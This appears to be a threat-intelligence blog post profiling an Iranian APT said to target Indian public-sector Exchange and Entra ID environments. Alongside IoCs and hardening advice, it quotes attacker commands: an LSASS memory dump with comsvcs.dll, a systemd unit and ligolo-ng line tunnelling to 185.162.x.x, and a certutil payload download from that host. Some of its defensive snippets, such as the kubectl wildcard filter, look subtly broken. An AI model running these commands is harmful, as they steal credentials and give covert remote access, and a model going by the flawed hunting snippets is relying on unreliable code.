During a recent forensic engagement involving a large Indian Public Sector Undertaking (PSU), I identified a persistent outbound connection from a compromised Microsoft Exchange 2019 server. The traffic was not typical HTTPS; it was a multiplexed tunnel established via ligolo-ng, a Go-based tunneling tool favored by Iranian state-sponsored actors. The destination IP, 185.162.x.x, mapped back to infrastructure previously associated with the cluster we track as Nimbus Manticore. This actor specializes in bridging the gap between legacy on-premises infrastructure and modern Entra ID (Azure AD) environments.
Understanding Nimbus Manticore APT: An Overview
Defining the Threat Actor Profile
Nimbus Manticore, frequently overlapping with groups like MuddyWater (Mercury) and Static Kitten, represents a disciplined Iranian operational cell. Unlike noisy ransomware groups, their primary objective is long-term espionage and data exfiltration. I have observed their shift from simple macro-enabled documents to sophisticated cloud-native persistence mechanisms. They demonstrate a deep understanding of hybrid identity synchronization, specifically targeting the trust relationship between local Active Directory and the cloud.
The group operates with a high degree of technical proficiency in PowerShell and Go. They rarely use off-the-shelf malware if a native system tool or a custom-wrapped open-source utility can achieve the same result. Their operational tempo suggests a well-funded environment with dedicated teams for initial access, internal lateral movement, and cloud-tenant takeover.
Historical Context and Evolution of the Group
Historically, this group relied on the "Small Sieve" backdoor, a custom script designed to evade detection by using Telegram for Command and Control (C2). In 2023 and early 2024, I observed a transition toward "Living-off-the-Cloud" techniques. They no longer just steal files; they reconfigure the target's tenant to ensure they maintain access even if passwords are reset.
The evolution of Nimbus Manticore mirrors the digital transformation of their targets. As Indian enterprises migrated to Office 365 during the 2020-2022 period, the group refined their TTPs to exploit the Azure AD Connect (now Entra ID Connect) service. They have moved from being an "on-prem threat" to a "hybrid identity threat."
Attribution and Known Affiliations
Links to Iranian State-Sponsored Operations
Attribution for Nimbus Manticore points toward the Iranian Ministry of Intelligence and Security (MOIS). We base this on the overlap in infrastructure, specifically the use of specific VPS providers in Russia and the Netherlands that have a long history of hosting MOIS-linked C2 nodes. The timing of their operations often aligns with Iranian working hours (UTC+3:30), with noticeable lulls during regional holidays.
The Connection Between Nimbus Manticore and MuddyWater (Mercury)
While some researchers group Nimbus Manticore directly under the MuddyWater umbrella, I distinguish them by their specific focus on cloud persistence. MuddyWater often utilizes the "Atera" or "ScreenConnect" remote management tools for access. Nimbus Manticore, however, prefers building custom tunnels and manipulating service principals within the Azure ecosystem. They share the same "Small Sieve" code base but apply it differently within the victim's lifecycle.
Geopolitical Motivations Behind the Attacks
The motivations are purely strategic. By targeting telecommunications and government sectors, they gain access to sensitive communications. In the Indian context, I have seen interest in infrastructure projects and trade negotiations. The goal is to provide the Iranian state with an information advantage in regional geopolitics, particularly concerning energy and maritime security.
Target Sectors and Geographic Focus
Strategic Interests in the Middle East and North Africa
The primary focus remains on the MENA region, specifically Saudi Arabia, Israel, and the UAE. However, their scope has expanded significantly into South Asia. They target entities that are central to regional stability or those that hold significant intellectual property.
Government, Telecommunications, and Critical Infrastructure Targets
In India, we have observed increased activity against Tier-2 ISPs and regional government departments. These organizations often lack the robust SIEM and threat detection capabilities of major metros, making them ideal staging grounds. Once a regional ISP is compromised, Nimbus Manticore uses that trust relationship to pivot into larger government networks.
Analysis of Victimology Patterns
The pattern is consistent: they target organizations running hybrid Exchange environments. The vulnerability of these systems, combined with the administrative complexity of managing Entra ID Connect, provides the perfect ingress point, emphasizing the need for vulnerability management automation to stay ahead of known exploits. They specifically look for "MSOL_" accounts, which are the service accounts created for directory synchronization. These accounts often have excessive permissions, such as 'Replicating Directory Changes All', which can be exploited to perform a DCSync attack.
Tactics, Techniques, and Procedures (TTPs)
Initial Access: Spear-Phishing and Vulnerability Exploitation
Initial access is frequently achieved through highly targeted spear-phishing or the exploitation of edge-facing vulnerabilities listed in the NIST NVD. I have seen heavy use of CVE-2024-21410 (Microsoft Exchange Server Privilege Escalation) to leak NTLM hashes.
Checking for vulnerable Exchange versions via OpenSSL
openssl s_client -connect mail.target-psu.in:443 -showcerts
Once the hash is obtained, they use NTLM relaying to gain unauthorized access to other internal resources. Another favorite is CVE-2023-3519, targeting Citrix ADC/Gateway to drop web shells that serve as the initial staging point for their toolsets, exploiting weaknesses often highlighted in the OWASP Top 10.
Lateral Movement and Credential Theft Strategies
After gaining a foothold, the group focuses on harvesting credentials from memory. They avoid using standard Mimikatz binaries to bypass EDR. Instead, they use PowerShell-based implementations or direct memory dumping of lsass.exe using comsvcs.dll.
Dumping LSASS memory silently using native Windows tools
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\windows\temp\lsass.dmp full
Persistence Mechanisms within Compromised Networks
Persistence is achieved through both the OS and the cloud. On Linux-based jump boxes, which should ideally be managed via a browser based SSH client to prevent credential theft, they install ligolo-ng as a systemd service to ensure the tunnel persists across reboots.
[Unit] Description=Persistence Tunnel Service After=network.target
[Service] Type=simple ExecStart=/tmp/ligolo-agent -connect 185.162.x.x:11601 -ignore-cert Restart=always RestartSec=30 StandardOutput=null StandardError=null
[Install] WantedBy=multi-user.target
In the cloud, they create new Service Principals or add "backdoor" credentials to existing ones. This allows them to generate access tokens even if the primary admin's password is changed.
Command-and-Control (C2) Infrastructure and Communication
Their C2 architecture is tiered. The first tier consists of compromised websites used as redirectors. The second tier is the actual C2 server, often running the ligolo-ng proxy. I have observed them using non-standard ports like 11601 or 4443 to blend in with legitimate application traffic.
Establishing the Ligolo-ng connection from the victim machine
./ligolo-ng -connect 185.162.x.x:11601 -ignore-cert
The Nimbus Manticore Malware Arsenal
Custom Backdoors and Proprietary Payloads
The most notable tool is "Small Sieve." This is a PowerShell script that uses the Telegram Bot API for communication. It is highly effective because many organizations do not block outbound traffic to api.telegram.org. The script is usually obfuscated with multiple layers of Base64 encoding and string manipulation.
Analysis of Small Sieve Obfuscation
We found that the group often uses a custom XOR routine to hide the Telegram API token. This prevents simple string searches from identifying the bot used for exfiltration.
Utilization of Living-off-the-Land (LotL) Techniques
Nimbus Manticore makes extensive use of certutil.exe for downloading payloads and mshta.exe for executing remote HTA files. By using these signed Microsoft binaries, they significantly reduce the chances of triggering basic AV alerts.
Downloading a second-stage payload using certutil
certutil.exe -urlcache -split -f http://185.162.x.x/p.txt C:\windows\temp\p.ps1
Analysis of Open-Source Tools and Scripts
The group is not afraid to use open-source tools if they are effective. We have seen them use BloodHound for mapping Active Directory paths and AdFind for querying directory objects. They also utilize Impacket for remote execution and relaying attacks within the internal network.
Recent Campaigns and Notable Case Studies
Breakdown of Recent Cyber Espionage Operations
In a 2024 campaign, we tracked Nimbus Manticore targeting an Indian telecommunications provider. The ingress point was an unpatched Exchange 2016 server. After exploiting CVE-2020-0688, they gained SYSTEM-level access and immediately began querying the configuration of the Exchange Web Services (EWS).
Querying Exchange configuration to identify external endpoints
Get-WebServicesVirtualDirectory | Select-Object Identity, ExternalUrl, InternalUrl | Export-CSV c:\temp\exchange_config.csv
Evolution of Delivery Methods in 2024
We are seeing a shift toward "MFA Fatigue" attacks. After obtaining credentials via phishing, the actor repeatedly triggers MFA prompts until the user approves the request. Once inside the Entra ID environment, they check for existing service principals with excessive permissions.
Identifying service principals with 'Backup' or 'Sync' in the name
az ad sp list --query "[?contains(displayName, 'Backup') || contains(displayName, 'Sync')].{AppId:appId, Permissions:requiredResourceAccess}"
In the Indian landscape, SMEs and PSUs frequently utilize 'Hybrid Identity' models where legacy on-prem Active Directory is synced to Azure via AD Connect. Nimbus Manticore specifically targets the 'MSOL_' service accounts common in these deployments. These accounts often retain 'Replicating Directory Changes' permissions, which are critical for the actor's lateral movement strategy.
Detection and Mitigation Strategies
Key Indicators of Compromise (IoCs) to Monitor
Monitoring for Nimbus Manticore requires a focus on both host-based and network-based telemetry. Look for the following:
- Unexpected outbound connections to
api.telegram.orgfrom servers (not workstations). - Presence of
ligolo-ngor similar Go-based binaries inC:\Windows\Tempor/tmp. - Service creation events (Event ID 7045) for non-standard services with high-frequency restarts.
- Modified Azure AD Service Principal credentials (Audit Log: "Update application – Certificates and secrets management").
Network Defense and Hardening Best Practices
Hardening must focus on the hybrid identity bridge and following a comprehensive SSH security hardening guide for Linux environments. I recommend implementing the following:
- Restrict MSOL Accounts: Ensure the MSOL service account only has the minimum permissions required for synchronization. Monitor for any login attempts using these accounts from non-sync servers.
- Exchange Hardening: Apply patches for CVE-2024-21410 and CVE-2020-0688 immediately. Disable NTLM where possible and move toward Kerberos-based authentication.
- Egress Filtering: Strictly limit outbound traffic from servers. Servers should not have general internet access. Use a proxy with deep packet inspection to identify tunneled traffic.
Incident Response Protocols for APT Threats
When responding to a Nimbus Manticore intrusion, do not simply reset user passwords. You must audit the Entra ID tenant for new "App Roles" or "Service Principal" credentials. If you miss these, the actor will regain access within minutes of your remediation efforts.
Under the DPDP Act 2023, Indian organizations are now mandated to report personal data breaches to the Data Protection Board. If Nimbus Manticore gains access to your Entra ID tenant, they likely have access to PII. Your IR plan must include a legal track to ensure compliance with these new regulations.
Kubernetes and Container Security
If the target environment uses K8s for hosting applications, I have seen Nimbus Manticore attempt to inject malicious containers to maintain persistence. Use the following command to audit your pods:
Searching for pods running images with 'manticore' or suspicious strings
kubectl get pods -A -o jsonpath='{.items[?(@.spec.containers[].image=="manticore*")].metadata.name}'
Conclusion: The Future Outlook of Nimbus Manticore
Predicted Shifts in Threat Actor Behavior
I expect Nimbus Manticore to further refine their "Living-off-the-Cloud" techniques. We will likely see them abusing Microsoft Graph API for data exfiltration, as this traffic is even harder to distinguish from legitimate Office 365 usage. They will also continue to exploit the "Hybrid Identity" gap, as many organizations in India are still in the middle of their cloud migration and haven't fully secured the synchronization process.
The Importance of Proactive Threat Intelligence
Relying on static IoCs is no longer sufficient. Security teams must adopt a "threat hunting" mindset, looking for the TTPs described above. Monitoring for abnormal service principal behavior and unauthorized NTLM relay attempts is critical. Organizations should also work closely with CERT-In to share intelligence on Iranian APT activity within the subcontinent.
The cost of a breach for an Indian PSU can exceed ₹50 Crore in direct remediation and indirect loss of trust. Investing in robust identity security and egress filtering is a fraction of that cost.
Next Command for Hunters
To check for unauthorized NTLM relaying attempts in your environment, monitor Event ID 4624 with Authentication Package "NTLM" and a Source Network Address that does not match your known internal IP range.
PowerShell snippet to find NTLM logons from external-facing subnets
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} | Where-Object {$_.Properties[10].Value -eq 'NTLM' -and $_.Properties[18].Value -ne '-'}